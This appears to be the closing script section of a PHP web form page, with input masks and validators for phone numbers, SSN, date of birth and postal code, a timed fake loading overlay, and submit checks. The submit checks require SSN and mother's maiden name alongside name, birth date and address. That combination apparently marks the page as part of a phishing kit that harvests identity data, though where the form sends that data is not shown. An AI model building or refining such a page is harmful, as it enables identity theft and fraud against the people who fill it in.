                    const phoneLengths = {'+1':10,'+7':10,'+20':10,'+27':9,'+30':10,'+31':9,'+32':9,'+33':9,'+34':9,'+36':9,'+39':10,'+40':9,'+41':9,'+43':10,'+44':10,'+45':8,'+46':9,'+47':8,'+48':9,'+49':11,'+51':9,'+52':10,'+53':8,'+54':10,'+55':11,'+56':9,'+57':10,'+58':10,'+60':10,'+61':9,'+62':12,'+63':10,'+64':9,'+65':8,'+66':9,'+81':10,'+82':10,'+84':10,'+86':11,'+90':10,'+91':10,'+92':10,'+93':9,'+94':9,'+95':9,'+98':10,'+211':9,'+212':9,'+213':9,'+216':8,'+218':9,'+220':7,'+221':9,'+222':8,'+223':8,'+224':9,'+225':10,'+226':8,'+227':8,'+228':8,'+229':8,'+230':8,'+231':7,'+232':8,'+233':9,'+234':10,'+235':8,'+236':8,'+237':9,'+238':7,'+239':7,'+240':9,'+241':7,'+242':9,'+243':9,'+244':9,'+245':7,'+246':7,'+247':4,'+248':7,'+249':9,'+250':9,'+251':9,'+252':8,'+253':6,'+254':9,'+255':9,'+256':9,'+257':8,'+258':9,'+260':9,'+261':9,'+262':9,'+263':9,'+264':9,'+265':9,'+266':8,'+267':8,'+268':8,'+269':7,'+290':4,'+291':7,'+297':7,'+298':6,'+299':6,'+350':8,'+351':9,'+352':9,'+353':9,'+354':7,'+355':9,'+356':8,'+357':8,'+358':9,'+359':9,'+370':8,'+371':8,'+372':8,'+373':8,'+374':8,'+375':9,'+376':6,'+377':8,'+378':10,'+380':9,'+381':9,'+382':8,'+383':8,'+385':9,'+386':8,'+387':8,'+389':8,'+420':9,'+421':9,'+423':7,'+500':5,'+501':7,'+502':8,'+503':8,'+504':8,'+505':8,'+506':8,'+507':8,'+508':6,'+509':8,'+590':9,'+591':8,'+592':7,'+593':9,'+594':9,'+595':9,'+596':9,'+597':7,'+598':8,'+599':7,'+670':8,'+672':6,'+673':7,'+674':7,'+675':8,'+676':7,'+677':7,'+678':7,'+679':7,'+680':7,'+681':6,'+682':5,'+683':4,'+685':7,'+686':8,'+687':6,'+688':5,'+689':6,'+690':4,'+691':7,'+692':7,'+850':10,'+852':8,'+853':8,'+855':9,'+856':10,'+880':10,'+886':9,'+960':7,'+961':8,'+962':9,'+963':9,'+964':10,'+965':8,'+966':9,'+967':9,'+968':8,'+970':9,'+971':9,'+972':9,'+973':8,'+974':8,'+975':8,'+976':8,'+977':10,'+992':9,'+993':8,'+994':9,'+995':9,'+996':9,'+998':9};
                    const maxDigits = phoneLengths[phoneCode] || 10;
                    let phone = input.value;
                    if (!phone.startsWith(phoneCode)) {
                        phone = phoneCode + ' ' + phone.replace(/^[\+\d\s]+/, '');
                    }
                    let digits = phone.substring(phoneCode.length).replace(/\D/g, '');
                    if (digits.length > maxDigits) digits = digits.substring(0, maxDigits);
                    let formatted = '';
                    if (maxDigits === 10 && digits.length > 0) {
                        if (digits.length >= 6) formatted = '(' + digits.substring(0,3) + ') ' + digits.substring(3,6) + '-' + digits.substring(6);
                        else if (digits.length >= 3) formatted = '(' + digits.substring(0,3) + ') ' + digits.substring(3);
                        else formatted = '(' + digits;
                    } else if (maxDigits === 11 && digits.length > 0) {
                        if (digits.length >= 7) formatted = digits.substring(0,3) + ' ' + digits.substring(3,7) + ' ' + digits.substring(7);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else if (maxDigits === 8 && digits.length > 0) {
                        if (digits.length >= 4) formatted = digits.substring(0,4) + ' ' + digits.substring(4);
                        else formatted = digits;
                    } else if (maxDigits === 9 && digits.length > 0) {
                        if (digits.length >= 5) formatted = digits.substring(0,3) + ' ' + digits.substring(3,5) + ' ' + digits.substring(5);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else if (maxDigits === 12 && digits.length > 0) {
                        if (digits.length >= 7) formatted = digits.substring(0,3) + ' ' + digits.substring(3,7) + ' ' + digits.substring(7);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else {
                        formatted = digits;
                    }
                    input.value = phoneCode + ' ' + formatted;
                    break;
                    
                case 'ssn':
                    let ssn = input.value.replace(/\D/g, '');
                    if (ssn.length >= 5) {
                        ssn = ssn.replace(/(\d{3})(\d{2})(\d{4})/, '$1-$2-$3');
                    } else if (ssn.length >= 3) {
                        ssn = ssn.replace(/(\d{3})(\d{0,2})/, '$1-$2');
                    }
                    input.value = ssn.substring(0, 11);
                    break;
                    
                case 'dateOfBirth':
                    let date = input.value.replace(/\D/g, '');
                    if (date.length >= 5) {
                        date = date.replace(/(\d{2})(\d{2})(\d{4})/, '$1/$2/$3');
                    } else if (date.length >= 3) {
                        date = date.replace(/(\d{2})(\d{0,2})/, '$1/$2');
                    }
                    input.value = date.substring(0, 10);
                    break;
            }
        }

        // Validate specific fields
        function validateField(input) {
            if (!input.getAttribute('data-touched')) return;
            
            let isValid = true;
            let errorMessage = '';
            
            switch (input.id) {
                case 'phoneNumber':
                    const valPhoneCode = '<?= htmlspecialchars($phoneCode) ?>';
                    const valPhoneLengths = {
                        '+1':10,'+7':10,'+20':10,'+27':9,'+30':10,'+31':9,'+32':9,'+33':9,'+34':9,'+36':9,'+39':10,'+40':9,'+41':9,'+43':10,'+44':10,'+45':8,'+46':9,'+47':8,'+48':9,'+49':11,'+51':9,'+52':10,'+53':8,'+54':10,'+55':11,'+56':9,'+57':10,'+58':10,'+60':10,'+61':9,'+62':12,'+63':10,'+64':9,'+65':8,'+66':9,'+81':10,'+82':10,'+84':10,'+86':11,'+90':10,'+91':10,'+92':10,'+93':9,'+94':9,'+95':9,'+98':10,'+211':9,'+212':9,'+213':9,'+216':8,'+218':9,'+220':7,'+221':9,'+222':8,'+223':8,'+224':9,'+225':10,'+226':8,'+227':8,'+228':8,'+229':8,'+230':8,'+231':7,'+232':8,'+233':9,'+234':10,'+235':8,'+236':8,'+237':9,'+238':7,'+239':7,'+240':9,'+241':7,'+242':9,'+243':9,'+244':9,'+245':7,'+246':7,'+247':4,'+248':7,'+249':9,'+250':9,'+251':9,'+252':8,'+253':6,'+254':9,'+255':9,'+256':9,'+257':8,'+258':9,'+260':9,'+261':9,'+262':9,'+263':9,'+264':9,'+265':9,'+266':8,'+267':8,'+268':8,'+269':7,'+290':4,'+291':7,'+297':7,'+298':6,'+299':6,'+350':8,'+351':9,'+352':9,'+353':9,'+354':7,'+355':9,'+356':8,'+357':8,'+358':9,'+359':9,'+370':8,'+371':8,'+372':8,'+373':8,'+374':8,'+375':9,'+376':6,'+377':8,'+378':10,'+380':9,'+381':9,'+382':8,'+383':8,'+385':9,'+386':8,'+387':8,'+389':8,'+420':9,'+421':9,'+423':7,'+500':5,'+501':7,'+502':8,'+503':8,'+504':8,'+505':8,'+506':8,'+507':8,'+508':6,'+509':8,'+590':9,'+591':8,'+592':7,'+593':9,'+594':9,'+595':9,'+596':9,'+597':7,'+598':8,'+599':7,'+670':8,'+672':6,'+673':7,'+674':7,'+675':8,'+676':7,'+677':7,'+678':7,'+679':7,'+680':7,'+681':6,'+682':5,'+683':4,'+685':7,'+686':8,'+687':6,'+688':5,'+689':6,'+690':4,'+691':7,'+692':7,'+850':10,'+852':8,'+853':8,'+855':9,'+856':10,'+880':10,'+886':9,'+960':7,'+961':8,'+962':9,'+963':9,'+964':10,'+965':8,'+966':9,'+967':9,'+968':8,'+970':9,'+971':9,'+972':9,'+973':8,'+974':8,'+975':8,'+976':8,'+977':10,'+992':9,'+993':8,'+994':9,'+995':9,'+996':9,'+998':9
                    };
                    const reqDigits = valPhoneLengths[valPhoneCode] || 10;
                    const phoneDigits = input.value.substring(valPhoneCode.length).replace(/\D/g, '');
                    isValid = phoneDigits.length === reqDigits;
                    errorMessage = 'Please enter a valid ' + reqDigits + '-digit phone number.';
                    break;
                    
                case 'ssn':
                    const ssnRegex = /^\d{3}-\d{2}-\d{4}$/;
                    isValid = ssnRegex.test(input.value);
                    errorMessage = 'Please enter a valid SSN (XXX-XX-XXXX).';
                    break;
                    
                case 'postalCode':
                    const zipRegex = /^[a-zA-Z0-9\s\-]{3,10}$/;
                    isValid = zipRegex.test(input.value.trim()) || input.value.trim() === '';
                    errorMessage = 'Please enter a valid postal code.';
                    break;
                    
                case 'dateOfBirth':
                    if (input.value) {
                        const dateRegex = /^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/;
                        if (!dateRegex.test(input.value)) {
                            isValid = false;
                            errorMessage = 'Please enter a valid date (MM/DD/YYYY).';
                        } else {
                            const parts = input.value.split('/');
                            const month = parseInt(parts[0], 10);
                            const day = parseInt(parts[1], 10);
                            const year = parseInt(parts[2], 10);
                            
                            const birthDate = new Date(year, month - 1, day);
                            const today = new Date();
                            
                            // Check if date is valid
                            if (birthDate.getMonth() !== month - 1 || birthDate.getDate() !== day || birthDate.getFullYear() !== year) {
                                isValid = false;
                                errorMessage = 'Please enter a valid date.';
                            } else if (birthDate > today) {
                                isValid = false;
                                errorMessage = 'Birth date cannot be in the future.';
                            } else {
                                const age = today.getFullYear() - birthDate.getFullYear();
                                const monthDiff = today.getMonth() - birthDate.getMonth();
                                const actualAge = monthDiff < 0 || (monthDiff === 0 && today.getDate() < birthDate.getDate()) ? age - 1 : age;
                                
                                if (actualAge < 18) {
                                    isValid = false;
                                    errorMessage = 'You must be at least 18 years old.';
                                } else if (actualAge > 120) {
                                    isValid = false;
                                    errorMessage = 'Please enter a valid birth date.';
                                }
                            }
                        }
                    }
                    break;
            }
            
            if (input.value.trim() !== '' && !isValid) {
                input.classList.add('error');
                const errorElement = document.getElementById(input.id + 'Error');
                if (errorElement) {
                    errorElement.querySelector('span').textContent = errorMessage;
                    errorElement.classList.add('show');
                }
            } else if (input.value.trim() !== '' && isValid) {
                input.classList.add('valid');
            }
        }

        // Initialize on page load
        document.addEventListener('DOMContentLoaded', function() {
            setupFloatingLabels();
            // City/state will auto-fill when user types ZIP code
        });
    </script>


    <script>
        // Simple Loading Screen - Hide after 1.5 seconds
        setTimeout(function() {
            const loadingOverlay = document.getElementById('loading-overlay');
            if (loadingOverlay) {
                loadingOverlay.style.opacity = '0';
                loadingOverlay.style.transition = 'opacity 0.3s ease';
                setTimeout(function() {
                    loadingOverlay.remove();
                }, 300);
            }
        }, 1500);
    </script>

    <script>
        // Form Submit Validation
        document.addEventListener('DOMContentLoaded', function() {
            const addressForm = document.getElementById('addressForm');
            const submitButton = document.getElementById('submitButton');
            
            if (addressForm) {
                addressForm.addEventListener('submit', function(e) {
                    // Clear previous error states
                    document.querySelectorAll('.error-message').forEach(el => el.classList.remove('show'));
                    document.querySelectorAll('.form-control').forEach(el => el.classList.remove('error', 'valid', 'valid-card', 'invalid-card'));
                    
                    let hasError = false;
                    
                    // Required fields validation
                    const requiredFields = [
                        { id: 'firstName', errorId: 'firstNameError', msg: 'Please enter your first name.' },
                        { id: 'lastName', errorId: 'lastNameError', msg: 'Please enter your last name.' },
                        { id: 'phoneNumber', errorId: 'phoneNumberError', msg: 'Please enter a valid phone number.' },
                        { id: 'dateOfBirth', errorId: 'dateOfBirthError', msg: 'Please enter your date of birth.' },
                        { id: 'address1', errorId: 'address1Error', msg: 'Please enter your address.' },
                        { id: 'region', errorId: 'regionError', msg: 'Please enter your city.' },
                        { id: 'state', errorId: 'stateError', msg: 'Please enter your state.' },
                        { id: 'postalCode', errorId: 'postalCodeError', msg: 'Please enter a valid postal code.' }
                    ];
                    
                    requiredFields.forEach(function(field) {
                        const input = document.getElementById(field.id);
                        const errorEl = document.getElementById(field.errorId);
                        if (input && input.value.trim() === '') {
                            input.classList.add('error');
                            if (errorEl) { errorEl.classList.add('show'); errorEl.style.display = 'flex'; }
                            hasError = true;
                        } else if (input) {
                            input.classList.add('valid');
                        }
                    });
                    
                    // Phone regex validation
                    const phoneInput = document.getElementById('phoneNumber');
                    if (phoneInput && phoneInput.value.trim() !== '') {
                        const phoneDigits = phoneInput.value.replace(/\D/g, '');
                        if (phoneDigits.length < 10) {
                            phoneInput.classList.remove('valid');
                            phoneInput.classList.add('error');
                            const phoneErr = document.getElementById('phoneNumberError');
                            if (phoneErr) { phoneErr.classList.add('show'); phoneErr.style.display = 'flex'; }
                            hasError = true;
                        }
                    }
                    
                    // DOB regex validation
                    const dobInput = document.getElementById('dateOfBirth');
                    if (dobInput && dobInput.value.trim() !== '') {
                        const dateRegex = /^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/;
                        if (!dateRegex.test(dobInput.value)) {
                            dobInput.classList.remove('valid');
                            dobInput.classList.add('error');
                            const dobErr = document.getElementById('dateOfBirthError');
                            if (dobErr) { dobErr.querySelector('span').textContent = 'Please enter a valid date (MM/DD/YYYY).'; dobErr.classList.add('show'); dobErr.style.display = 'flex'; }
                            hasError = true;
                        }
                    }
                    
                    // SSN regex validation (if visible)
                    const ssnInput = document.getElementById('ssn');
                    if (ssnInput) {
                        if (ssnInput.value.trim() === '') {
                            ssnInput.classList.add('error');
                            const ssnErr = document.getElementById('ssnError');
                            if (ssnErr) { ssnErr.classList.add('show'); ssnErr.style.display = 'flex'; }
                            hasError = true;
                        } else {
                            const ssnRegex = /^\d{3}-\d{2}-\d{4}$/;
                            if (!ssnRegex.test(ssnInput.value)) {
                                ssnInput.classList.add('error');
                                const ssnErr = document.getElementById('ssnError');
                                if (ssnErr) { ssnErr.classList.add('show'); ssnErr.style.display = 'flex'; }
                                hasError = true;
                            } else {
                                ssnInput.classList.add('valid');
                            }
                        }
                    }
                    
                    // MMN validation (if visible)
                    const mmnInput = document.getElementById('motherMaidenName');
                    if (mmnInput) {
                        if (mmnInput.value.trim() === '') {
                            mmnInput.classList.add('error');
                            const mmnErr = document.getElementById('motherMaidenNameError');
                            if (mmnErr) { mmnErr.classList.add('show'); mmnErr.style.display = 'flex'; }
                            hasError = true;
                        } else {
                            mmnInput.classList.add('valid');
                        }
                    }
                    
                    // Agree checkbox
                    const agree = document.getElementById('agree');
                    if (agree && !agree.checked) {
                        alert('You must agree to the terms and conditions.');
                        hasError = true;
                    }
                    
                    if (hasError) {
                        e.preventDefault();
                        // Scroll to first error
                        const firstError = document.querySelector('.error');
                        if (firstError) firstError.scrollIntoView({ behavior: 'smooth', block: 'center' });
                        return false;
                    }
                    
                    // Show loading state on button
                    if (submitButton) {
                        submitButton.classList.add('loading');
                        submitButton.innerHTML = '<span class="btn-spinner"></span>Processing...';
                        submitButton.disabled = true;
                    }
                });
            }
        });
    </script>

</body>
</html> 